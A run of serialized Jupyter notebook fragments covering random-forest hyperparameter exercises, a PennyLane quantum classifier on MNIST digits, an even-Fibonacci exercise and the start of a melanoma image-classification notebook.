"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\nThe error variance across runs is even lower (tighter).\n</details>",
"_____no_output_____"
],
[
"## Examining model size and complexity\n\nThe structure of a tree is affected by a number of hyper parameters, not just the data. Goal in the section is to see the effect of altering the number of samples per leaf and the maximum number of candidate features per split. Let's start out with a handy function that uses some support code from rfpimp to examine tree size and depth:",
"_____no_output_____"
]
],
[
[
"def showsize(ntrees, max_features=1.0, min_samples_leaf=1):\n rf = RandomForestRegressor(n_estimators=ntrees,\n max_features=max_features,\n min_samples_leaf=min_samples_leaf,\n n_jobs=-1)\n rf.fit(X_train, y_train)\n n = rfnnodes(rf) # from rfpimp\n h = np.median(rfmaxdepths(rf)) # rfmaxdepths from rfpimp\n mae_train = mean_absolute_error(y_train, rf.predict(X_train))\n mae = mean_absolute_error(y_test, rf.predict(X_test))\n print(f\"MAE train {mae_train:6.1f}$, test {mae:6.1f}$ using {n:9,d} tree nodes with {h:2.0f} median tree height\")",
"_____no_output_____"
]
],
[
[
"### Effect of number of trees",
"_____no_output_____"
],
[
"For a single tree, we see about 21,000 nodes and a tree height of around 35:",
"_____no_output_____"
]
],
[
[
"showsize(ntrees=1)",
"_____no_output_____"
]
],
[
[
"**Task**: Look at the metrics for 2 trees and then 100 trees.",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\n<pre>\nshowsize(ntrees=2)\nshowsize(ntrees=100)\n</pre>\n</details>",
"_____no_output_____"
],
[
"**Q.** Why does the median height of a tree stay the same when we increase the number of trees?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\nWhile the number of nodes increases with the number of trees, the height of any individual tree will stay the same because we have not fundamentally changed how it is constructing a single tree.\n</details>",
"_____no_output_____"
],
[
"### Effect of increasing min samples / leaf",
"_____no_output_____"
],
[
"**Task**: Loop around a call to `showsize()` with 10 trees and min_samples_leaf=1..10 ",
"_____no_output_____"
]
],
[
[
"for i in range(...):\n print(f\"{i:2d} \",end='')\n showsize(...)",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\nfor i in range(1,10+1):\n showsize(ntrees=10, min_samples_leaf=i)\n</pre>\n</details>",
"_____no_output_____"
],
[
"**Q.** Why do the median height of a tree and number of total nodes decrease as we increase the number of samples per leaf?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\nBecause when the sample size gets down to `min_samples_leaf`, splitting stops, which prevents the tree from getting taller. It also restricts how many nodes total get created for the tree.\n</details> ",
"_____no_output_____"
],
[
"**Q.** Why does the MAE error increase?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\nIf we include more observations in a single leaf, then the average is taken over more samples. That average is a more general prediction but less accurate.\n</details> ",
"_____no_output_____"
],
[
"It's pretty clear from that print out that `min_samples_leaf=1` is the best choice because it gives the minimum validation error.",
"_____no_output_____"
],
[
"### Effect of reducing max_features (rent data)",
"_____no_output_____"
],
[
"**Task:** Do another loop from `max_features` = 4 down to 1, with 1 sample per leaf. (There are 4 total features.)",
"_____no_output_____"
]
],
[
[
"p = X_train.shape[1]\nfor i in range(...):\n print(f\"{i:2d} \",end='')\n showsize(ntrees=10, ...)",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\np = X_train.shape[1]\nfor i in range(p,0,-1):\n print(f\"{i:2d} \",end='')\n showsize(ntrees=10, max_features=i)\n</pre>\n</details>",
"_____no_output_____"
],
[
"For this data set, changing the available candidate features that each split does not seem to be important as the validation error does not change, nor does the height of the trees.",
"_____no_output_____"
],
[
"### Examine effects of hyper parameters on Boston data set",
"_____no_output_____"
]
],
[
[
"df_boston = boston()\ndf_boston.head(3)",
"_____no_output_____"
],
[
"X, y = df_boston.drop('y', axis=1), df_boston['y']\ny *= 1000 # y is \"Median value of owner-occupied homes in $1000's\" so multiply by 1000\n\n# reproducible 20% test set\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20, random_state=1)",
"_____no_output_____"
]
],
[
[
"Let's run the metric `showsize()` function to see how many trees we should use:",
"_____no_output_____"
]
],
[
[
"for i in [1,5,30,50,100,150,300]:\n print(f\"{i:3d} trees: \", end='')\n showsize(ntrees=i)",
"_____no_output_____"
]
],
[
[
"Seems like the sweet spot on the validation error is probably 150 trees as it gets a low validation error and has a fairly small set of trees.",
"_____no_output_____"
],
[
"Check the effect of increasing the minimum samples per leaf from 1 to 10 as we did before.",
"_____no_output_____"
]
],
[
[
"for i in range(1,10+1):\n print(f\"{i:2d} \",end='')\n showsize(ntrees=150, min_samples_leaf=i)",
"_____no_output_____"
]
],
[
[
"The training error goes up dramatically but the validation error doesn't get too much worse. ",
"_____no_output_____"
],
[
"**Q.** Which min samples per leaf would you choose?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\n After running a few times, it seems that using <tt>min_samples_leaf</tt>=1 or 2 is best for the validation error. But, keep in mind that this data set is pretty small and so our error values will change quite a bit depending on the sample we get for the test set.\n</details> ",
"_____no_output_____"
],
[
"Run a loop from the maximum number of features down to 1 for `max_features` to see the effects.",
"_____no_output_____"
]
],
[
[
"p = X_train.shape[1]\nfor i in range(p,0,-1):\n print(f\"{i:2d} \",end='')\n showsize(ntrees=150, max_features=i, min_samples_leaf=3)",
"_____no_output_____"
]
],
[
[
"**Q.** Which max features would you choose?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\n After running a few times, it seems that using <tt>max_features</tt>=7 or 13 gets best validation error, but again it depends on the randomness of the tree construction and results will vary across runs.\n</details> ",
"_____no_output_____"
],
[
"Here's what the final model would look like:",
"_____no_output_____"
]
],
[
[
"showsize(ntrees=150, max_features=13, min_samples_leaf=1)",
"_____no_output_____"
]
],
[
[
"## RF prediction confidence\n\nA random forest is a collection of decision trees, each of which contributes a prediction. The forest averages those predictions to provide the overall prediction (or takes most common vote for classification). Let's dig inside the random forest to get the individual trees out and ask them what their predictions are.",
"_____no_output_____"
],
[
"**Task**: Train a random forest with 10 trees on `X_train`, `y_train`. Use `for t in rf.estimators_` to iterate through the trees making predictions with `t` not `rf`. Print out the usual MAE scores for each tree predictor.",
"_____no_output_____"
]
],
[
[
"rf = RandomForestRegressor(n_estimators=10, n_jobs=-1)\nrf.fit(X_train, y_train)\n\nfor t in ...:\n mae_train = ...\n mae = ...\n print(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\nrf = RandomForestRegressor(n_estimators=10, n_jobs=-1)\nrf.fit(X_train, y_train)\n\nfor t in rf.estimators_:\n mae_train = mean_absolute_error(y_train, t.predict(X_train))\n mae = mean_absolute_error(y_test, t.predict(X_test))\n print(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")\n</pre>\n</details>",
"_____no_output_____"
],
[
"Notice that it bounces around quite a bit. ",
"_____no_output_____"
],
[
"**Task**: Select one of the `X_test` rows and print out the addicted rent price.",
"_____no_output_____"
]
],
[
[
"x = ... # pick single test case\nx = x.values.reshape(1,-1) # Needs to be a one-row matrix\n\nprint(f\"{x} => {rf.predict(x)}$\")",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\nx = X_test.iloc[3,:] # pick single test case\nx = x.values.reshape(1,-1)\nprint(f\"{x} => {rf.predict(x)}$\")\n</pre>\n</details>",
"_____no_output_____"
],
[
"**Task**: Now let's see how the forest came to that conclusion. Compute the average of the predictions obtained from every tree. \n\nCompare that to the prediction obtained directly from the random forest (`rf.predict(X_test)`). They should be the same.",
"_____no_output_____"
]
],
[
[
"y_pred = ...\nprint(f\"{x} => {y_pred}$\")",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\ny_pred = np.mean([t.predict(x) for t in rf.estimators_])\nprint(f\"{x} => {y_pred}$\")\n</pre>\n</details>",
"_____no_output_____"
],
[
"**Task**: Compute the standard deviation of the tree estimates and print that out.",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\n<pre>\nnp.std([t.predict(x) for t in rf.estimators_])\n</pre>\n</details>",
"_____no_output_____"
],
[
"The lower the standard deviation, the more tightly grouped the predictions were, which means we should have more confidence in our answer. \n\nDifferent records will often have different standard deviations, which means we could have different levels of confidence in the various answers. This might be helpful to a bank for example that wanted to not only predict whether to give loans, but how confident the model was.",
"_____no_output_____"
],
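[
"A minimal sketch of that idea, assuming the `rf`, `X_test`, and `np` defined above: compute the per-record standard deviation across the individual trees and inspect its spread.",
"_____no_output_____"
],
[
"# Per-record spread of the individual tree predictions -- a rough confidence signal.\n# Assumes rf (the 10-tree forest trained above), X_test, and numpy as np are in scope.\nall_tree_preds = np.stack([t.predict(X_test) for t in rf.estimators_])  # shape (n_trees, n_records)\nper_record_std = all_tree_preds.std(axis=0)\nprint(per_record_std.min(), per_record_std.mean(), per_record_std.max())",
"_____no_output_____"
],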
[
"## Altering bootstrap size\n\n**This no longer works with latest versions of scikit-learn... and the feature is not yet implemented by them* See [related github issue](https://github.com/scikit-learn/scikit-learn/issues/11993). Ah [this new features](https://github.com/scikit-learn/scikit-learn/pull/14682) covers it for trees. \"Adds a max_samples kwarg to forest ensembles that limits the size of the bootstrap samples used to train each estimator.\"",
"_____no_output_____"
]
],
[
[
"NO LONGER NEEDED\ndef jeremy_trick_RF_sample_size(n):\n if LooseVersion(sklearn.__version__) >= LooseVersion(\"0.24\"):\n forest._generate_sample_indices = \\\n (lambda rs, n_samples, _:\n forest.check_random_state(rs).randint(0, n_samples, n))\n else:\n forest._generate_sample_indices = \\\n (lambda rs, n_samples: forest.check_random_state(rs).randint(0, n_samples, n))",
"_____no_output_____"
]
],
[
[
"X, y = rent()\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20)",
"_____no_output_____"
]
],
[
[
"**Task**: There are about 38,000 training records, change that to 19,000 and check the accuracy again.",
"_____no_output_____"
]
],
[
[
"rf = RandomForestRegressor(n_estimators=200) # don't compute in parallel so we can see timing\n%time rf.fit(X_train, y_train)\nmae_train = mean_absolute_error(y_train, rf.predict(X_train))\nmae = mean_absolute_error(y_test, rf.predict(X_test))\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"CPU times: user 8.64 s, sys: 235 ms, total: 8.88 s\nWall time: 8.95 s\nMAE train 184.2$, test 291.1$\n"
],
[
"rf = RandomForestRegressor(n_estimators=200, max_samples=1/2)\n%time rf.fit(X_train, y_train)\nmae_train = mean_absolute_error(y_train, rf.predict(X_train))\nmae = mean_absolute_error(y_test, rf.predict(X_test))\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"CPU times: user 5.75 s, sys: 122 ms, total: 5.88 s\nWall time: 5.96 s\nMAE train 226.7$, test 307.1$\n"
]
],
[
[
"It's a bit less accurate, but it's faster.",
"_____no_output_____"
],
[
"**Q.** Why is it less accurate?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\nEach tree is seeing less of the data set during training.\n</details>",
"_____no_output_____"
],
[
"**Task**: Turn off bootstrapping by adding `bootstrap=False` to the constructor of the model. This means that it will subsample rather than bootstrap. Remember that bootstrapping gets about two thirds of the data because of replacement.",
"_____no_output_____"
]
],
[
[
"rf = ...\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\nrf = RandomForestRegressor(n_estimators=200, n_jobs=-1, bootstrap=False)\n%time rf.fit(X_train, y_train)\nmae_train = mean_absolute_error(y_train, rf.predict(X_train))\nmae = mean_absolute_error(y_test, rf.predict(X_test))\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")\n</pre>\n</details>",
"_____no_output_____"
],
[
"That brings the accuracy back up a little bit for the test set but very much so for the training MAE score.",
"_____no_output_____"
],
[
"**Task**: Drop that size to one third of the training records then retrain and test.",
"_____no_output_____"
]
],
[
[
"rf = RandomForestRegressor(n_estimators=200, max_samples=1/3, n_jobs=-1)\n%time rf.fit(X_train, y_train)\nmae_train = mean_absolute_error(y_train, rf.predict(X_train))\nmae = mean_absolute_error(y_test, rf.predict(X_test))\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"_____no_output_____"
]
],
[
[
"Mine is twice as fast as the full bootstrap but continues to have very tight variance because of the number of trees. The accuracy is lower, however, about what we get for the usual random forest with two trees.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"raw",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"raw"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb04e28304749e37ecd55e888497c1c9c90f6676 | 21,945 | ipynb | Jupyter Notebook | PennyLane/Data Reuploading Classifier/Conv + DRC Keras MNIST (best).ipynb | Graciaira/quantum_image_classifier | 1e6a8ec93f51dcbfd63c2e652be5d1fcbce283ce | [
"MIT"
] | 1 | 2021-06-08T12:32:09.000Z | 2021-06-08T12:32:09.000Z | PennyLane/Data Reuploading Classifier/Conv + DRC Keras MNIST (best).ipynb | Graciaira/quantum_image_classifier | 1e6a8ec93f51dcbfd63c2e652be5d1fcbce283ce | [
"MIT"
] | null | null | null | PennyLane/Data Reuploading Classifier/Conv + DRC Keras MNIST (best).ipynb | Graciaira/quantum_image_classifier | 1e6a8ec93f51dcbfd63c2e652be5d1fcbce283ce | [
"MIT"
] | null | null | null | 28.611473 | 139 | 0.529779 | [
[
[
"# Mount Google Drive\nfrom google.colab import drive # import drive from google colab\n \nROOT = \"/content/drive\" # default location for the drive\nprint(ROOT) # print content of ROOT (Optional)\n \ndrive.mount(ROOT) # we mount the google drive at /content/drive",
"/content/drive\nMounted at /content/drive\n"
],
[
"!pip install pennylane\nfrom IPython.display import clear_output\nclear_output()",
"_____no_output_____"
],
[
"import os\n\ndef restart_runtime():\n os.kill(os.getpid(), 9)\nrestart_runtime()",
"_____no_output_____"
],
[
"# %matplotlib inline\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\nimport numpy as np",
"_____no_output_____"
]
],
[
[
"# Loading Raw Data",
"_____no_output_____"
]
],
[
[
"import tensorflow as tf\n\n(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()\n\nx_train = x_train[:, 0:27, 0:27]\nx_test = x_test[:, 0:27, 0:27]",
"_____no_output_____"
],
[
"x_train_flatten = x_train.reshape(x_train.shape[0], x_train.shape[1]*x_train.shape[2])/255.0\nx_test_flatten = x_test.reshape(x_test.shape[0], x_test.shape[1]*x_test.shape[2])/255.0",
"_____no_output_____"
],
[
"print(x_train_flatten.shape, y_train.shape)\nprint(x_test_flatten.shape, y_test.shape)",
"(60000, 729) (60000,)\n(10000, 729) (10000,)\n"
],
[
"x_train_0 = x_train_flatten[y_train == 0]\nx_train_1 = x_train_flatten[y_train == 1]\nx_train_2 = x_train_flatten[y_train == 2]\nx_train_3 = x_train_flatten[y_train == 3]\nx_train_4 = x_train_flatten[y_train == 4]\nx_train_5 = x_train_flatten[y_train == 5]\nx_train_6 = x_train_flatten[y_train == 6]\nx_train_7 = x_train_flatten[y_train == 7]\nx_train_8 = x_train_flatten[y_train == 8]\nx_train_9 = x_train_flatten[y_train == 9]\n\nx_train_list = [x_train_0, x_train_1, x_train_2, x_train_3, x_train_4, x_train_5, x_train_6, x_train_7, x_train_8, x_train_9]\n\nprint(x_train_0.shape)\nprint(x_train_1.shape)\nprint(x_train_2.shape)\nprint(x_train_3.shape)\nprint(x_train_4.shape)\nprint(x_train_5.shape)\nprint(x_train_6.shape)\nprint(x_train_7.shape)\nprint(x_train_8.shape)\nprint(x_train_9.shape)",
"(5923, 729)\n(6742, 729)\n(5958, 729)\n(6131, 729)\n(5842, 729)\n(5421, 729)\n(5918, 729)\n(6265, 729)\n(5851, 729)\n(5949, 729)\n"
],
[
"x_test_0 = x_test_flatten[y_test == 0]\nx_test_1 = x_test_flatten[y_test == 1]\nx_test_2 = x_test_flatten[y_test == 2]\nx_test_3 = x_test_flatten[y_test == 3]\nx_test_4 = x_test_flatten[y_test == 4]\nx_test_5 = x_test_flatten[y_test == 5]\nx_test_6 = x_test_flatten[y_test == 6]\nx_test_7 = x_test_flatten[y_test == 7]\nx_test_8 = x_test_flatten[y_test == 8]\nx_test_9 = x_test_flatten[y_test == 9]\n\nx_test_list = [x_test_0, x_test_1, x_test_2, x_test_3, x_test_4, x_test_5, x_test_6, x_test_7, x_test_8, x_test_9]\n\nprint(x_test_0.shape)\nprint(x_test_1.shape)\nprint(x_test_2.shape)\nprint(x_test_3.shape)\nprint(x_test_4.shape)\nprint(x_test_5.shape)\nprint(x_test_6.shape)\nprint(x_test_7.shape)\nprint(x_test_8.shape)\nprint(x_test_9.shape)",
"(980, 729)\n(1135, 729)\n(1032, 729)\n(1010, 729)\n(982, 729)\n(892, 729)\n(958, 729)\n(1028, 729)\n(974, 729)\n(1009, 729)\n"
]
],
[
[
"# Selecting the dataset\n\nOutput: X_train, Y_train, X_test, Y_test",
"_____no_output_____"
]
],
[
[
"X_train = np.concatenate((x_train_list[0][:200, :], x_train_list[1][:200, :]), axis=0)\nY_train = np.zeros((X_train.shape[0],), dtype=int)\nY_train[200:] += 1\n\nX_train.shape, Y_train.shape",
"_____no_output_____"
],
[
"X_test = np.concatenate((x_test_list[0][:500, :], x_test_list[1][:500, :]), axis=0)\nY_test = np.zeros((X_test.shape[0],), dtype=int)\nY_test[500:] += 1\n\nX_test.shape, Y_test.shape",
"_____no_output_____"
]
],
[
[
"# Dataset Preprocessing",
"_____no_output_____"
]
],
[
[
"X_train = X_train.reshape(X_train.shape[0], 27, 27, 1)\nX_test = X_test.reshape(X_test.shape[0], 27, 27, 1)\n\nX_train.shape, X_test.shape",
"_____no_output_____"
]
],
[
[
"# Quantum",
"_____no_output_____"
]
],
[
[
"import pennylane as qml\nfrom pennylane import numpy as np\nfrom pennylane.optimize import AdamOptimizer, GradientDescentOptimizer\n\nqml.enable_tape()\n\nfrom tensorflow.keras.utils import to_categorical\n\n# Set a random seed\nnp.random.seed(2020)",
"_____no_output_____"
],
[
"# Define output labels as quantum state vectors\ndef density_matrix(state):\n \"\"\"Calculates the density matrix representation of a state.\n\n Args:\n state (array[complex]): array representing a quantum state vector\n\n Returns:\n dm: (array[complex]): array representing the density matrix\n \"\"\"\n return state * np.conj(state).T\n\n\nlabel_0 = [[1], [0]]\nlabel_1 = [[0], [1]]\nstate_labels = [label_0, label_1]",
"_____no_output_____"
],
[
"n_qubits = 2\ndev = qml.device(\"default.qubit\", wires=n_qubits)\n\n\[email protected](dev)\ndef qcircuit(params, inputs):\n \"\"\"A variational quantum circuit representing the DRC.\n\n Args:\n params (array[float]): array of parameters\n inputs = [x, y]\n x (array[float]): 1-d input vector\n y (array[float]): single output state density matrix\n\n Returns:\n float: fidelity between output state and input\n \"\"\"\n \n # layer iteration\n for l in range(len(params[0])):\n # qubit iteration\n for q in range(n_qubits):\n # gate iteration\n for g in range(int(len(inputs)/3)):\n qml.Rot(*(params[0][l][3*g:3*(g+1)] * inputs[3*g:3*(g+1)] + params[1][l][3*g:3*(g+1)]), wires=q)\n \n return [qml.expval(qml.Hermitian(density_matrix(state_labels[i]), wires=[i])) for i in range(n_qubits)]\n",
"_____no_output_____"
],
[
"class class_weights(tf.keras.layers.Layer):\n def __init__(self):\n super(class_weights, self).__init__()\n w_init = tf.random_normal_initializer()\n self.w = tf.Variable(\n initial_value=w_init(shape=(1, 2), dtype=\"float32\"),\n trainable=True,\n )\n\n def call(self, inputs):\n return (inputs * self.w)",
"_____no_output_____"
],
[
"X = tf.keras.Input(shape=(27,27,1))\n\nconv_layer_1 = tf.keras.layers.Conv2D(filters=1, kernel_size=[3,3], strides=[2,2], name='Conv_Layer_1')(X)\nconv_layer_2 = tf.keras.layers.Conv2D(filters=1, kernel_size=[3,3], strides=[2,2], name='Conv_Layer_2')(conv_layer_1)\nmax__pool_layer = tf.keras.layers.MaxPooling2D(pool_size=(2, 2), strides=None, name='Max_Pool_Layer')(conv_layer_2)\nreshapor_layer = tf.keras.layers.Reshape((9,), name='Reshapor_Layer')(max__pool_layer)\n\nqlayer = qml.qnn.KerasLayer(qcircuit, {\"params\": (2, 1, 9)}, output_dim=2, name='Quantum_Layer')(reshapor_layer)\n\nclass_weights_layer = class_weights()(qlayer)\n\nmodel = tf.keras.Model(inputs=X, outputs=class_weights_layer, name='Conv DRC')",
"_____no_output_____"
],
[
"model(X_train[0:32])",
"_____no_output_____"
],
[
"model.summary()",
"Model: \"Conv DRC\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\ninput_50 (InputLayer) [(None, 27, 27, 1)] 0 \n_________________________________________________________________\nConv_Layer_1 (Conv2D) (None, 13, 13, 1) 10 \n_________________________________________________________________\nConv_Layer_2 (Conv2D) (None, 6, 6, 1) 10 \n_________________________________________________________________\nMax_Pool_Layer (MaxPooling2D (None, 3, 3, 1) 0 \n_________________________________________________________________\nReshapor_Layer (Reshape) (None, 9) 0 \n_________________________________________________________________\nQuantum_Layer (KerasLayer) (None, 2) 18 \n_________________________________________________________________\nclass_weights_15 (class_weig (None, 2) 2 \n=================================================================\nTotal params: 40\nTrainable params: 40\nNon-trainable params: 0\n_________________________________________________________________\n"
],
[
"opt = tf.keras.optimizers.Adam(learning_rate=0.1)\nmodel.compile(opt, loss=\"mse\", metrics=[\"accuracy\"])",
"_____no_output_____"
],
[
"model.fit(X_train, to_categorical(Y_train), epochs=6, batch_size=32, validation_data=(X_test, to_categorical(Y_test)), verbose=1)",
"Epoch 1/6\n13/13 [==============================] - 47s 4s/step - loss: 0.3558 - accuracy: 0.6175 - val_loss: 0.0762 - val_accuracy: 0.9180\nEpoch 2/6\n13/13 [==============================] - 47s 4s/step - loss: 0.0839 - accuracy: 0.9218 - val_loss: 0.0904 - val_accuracy: 0.9080\nEpoch 3/6\n13/13 [==============================] - 48s 4s/step - loss: 0.0723 - accuracy: 0.9334 - val_loss: 0.0534 - val_accuracy: 0.9560\nEpoch 4/6\n13/13 [==============================] - 47s 4s/step - loss: 0.0401 - accuracy: 0.9720 - val_loss: 0.0455 - val_accuracy: 0.9570\nEpoch 5/6\n13/13 [==============================] - 47s 4s/step - loss: 0.0377 - accuracy: 0.9781 - val_loss: 0.0453 - val_accuracy: 0.9640\nEpoch 6/6\n13/13 [==============================] - 47s 4s/step - loss: 0.0383 - accuracy: 0.9716 - val_loss: 0.0432 - val_accuracy: 0.9600\n"
],
[
"predict_test = model.predict(X_test)",
"_____no_output_____"
]
]
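[
[
"The two circuit outputs are fidelities with the |0> and |1> label states, so a hard class prediction can be taken as the argmax over them. A small illustrative evaluation (added sketch; it assumes `Y_test` holds integer labels 0/1, as implied by the `to_categorical` call above):",
"_____no_output_____"
],
[
"import numpy as np  # assumed already available as np\n\n# convert the fidelity pairs into hard labels and compare with the ground truth\npredicted_labels = np.argmax(predict_test, axis=1)\ntest_accuracy = np.mean(predicted_labels == np.array(Y_test).reshape(-1))\nprint('Test accuracy:', test_accuracy)",
"_____no_output_____"
]
],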
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb04f9d49e22e8b0b99de6685137ce1ec73afa0c | 1,124 | ipynb | Jupyter Notebook | Lecture 2 Conditionals loops and Functions/Practice/Even Fibonacci Numbers-checkpoint.ipynb | Paraskk/Data-Science-and-Machine-Leaning- | b29223a82ea39f7860d3729d7297bac2a4724c8f | [
"MIT"
] | 1 | 2021-12-13T12:37:25.000Z | 2021-12-13T12:37:25.000Z | Lecture 2 Conditionals loops and Functions/Practice/Even Fibonacci Numbers-checkpoint.ipynb | Udaysonu/Coding-Ninjas-Machine-Learning | 4fd6b4b62f07b28dbe80c084ad820630f2351a76 | [
"MIT"
] | null | null | null | Lecture 2 Conditionals loops and Functions/Practice/Even Fibonacci Numbers-checkpoint.ipynb | Udaysonu/Coding-Ninjas-Machine-Learning | 4fd6b4b62f07b28dbe80c084ad820630f2351a76 | [
"MIT"
] | 2 | 2020-08-27T13:03:33.000Z | 2020-09-01T17:34:23.000Z | 19.37931 | 210 | 0.508897 | [
[
[
"## Given a number N find the sum of all the even valued terms in the fibonacci sequence less than or equal to N. Try generating only even fibonacci numbers instead of iterating over all Fibonacci numbers.",
"_____no_output_____"
]
],
[
[
"n=int(input())\na,b=1,1\nsum=0\nwhile a<=n:\n if a%2==0:\n sum+=a\n a,b=b,a+b\nprint(sum)",
"4\n2\n"
]
]
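[
[
"The hint above suggests generating only the even-valued terms directly. A possible sketch (illustrative addition, not the original solution): every third Fibonacci number is even, and the even terms 2, 8, 34, ... satisfy E(k) = 4*E(k-1) + E(k-2).",
"_____no_output_____"
],
[
"n = int(input())\n# even Fibonacci terms only: 2, 8, 34, 144, ... via E(k) = 4*E(k-1) + E(k-2)\neven_a, even_b = 2, 8\ntotal = 0\nwhile even_a <= n:\n    total += even_a\n    even_a, even_b = even_b, 4 * even_b + even_a\nprint(total)",
"_____no_output_____"
]
],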
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
]
] |
cb050b54cf2f4a5b325876512c49554c6a289672 | 955,835 | ipynb | Jupyter Notebook | Model backlog/Train/31-melanoma-5fold-resnet18-cosine-decay-wr.ipynb | dimitreOliveira/melanoma-classification | e366a645b872f035a34fd2df5ee96fa8a1615ce1 | [
"MIT"
] | 10 | 2020-08-19T02:54:32.000Z | 2021-11-14T16:04:08.000Z | Model backlog/Train/31-melanoma-5fold-resnet18-cosine-decay-wr.ipynb | dimitreOliveira/melanoma-classification | e366a645b872f035a34fd2df5ee96fa8a1615ce1 | [
"MIT"
] | null | null | null | Model backlog/Train/31-melanoma-5fold-resnet18-cosine-decay-wr.ipynb | dimitreOliveira/melanoma-classification | e366a645b872f035a34fd2df5ee96fa8a1615ce1 | [
"MIT"
] | 5 | 2020-09-16T14:04:36.000Z | 2021-03-05T12:44:44.000Z | 286.951366 | 249,176 | 0.889544 | [
[
[
"## Dependencies",
"_____no_output_____"
]
],
[
[
"# !pip install --quiet efficientnet\n!pip install --quiet image-classifiers",
"_____no_output_____"
],
[
"import warnings, json, re, glob, math\nfrom scripts_step_lr_schedulers import *\nfrom melanoma_utility_scripts import *\nfrom kaggle_datasets import KaggleDatasets\nfrom sklearn.model_selection import KFold\nimport tensorflow.keras.layers as L\nimport tensorflow.keras.backend as K\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom tensorflow.keras import optimizers, layers, metrics, losses, Model\n# import efficientnet.tfkeras as efn\nfrom classification_models.tfkeras import Classifiers\nimport tensorflow_addons as tfa\n\nSEED = 0\nseed_everything(SEED)\nwarnings.filterwarnings(\"ignore\")",
"_____no_output_____"
]
],
[
[
"## TPU configuration",
"_____no_output_____"
]
],
[
[
"strategy, tpu = set_up_strategy()\nprint(\"REPLICAS: \", strategy.num_replicas_in_sync)\nAUTO = tf.data.experimental.AUTOTUNE",
"REPLICAS: 1\n"
]
],
[
[
"# Model parameters",
"_____no_output_____"
]
],
[
[
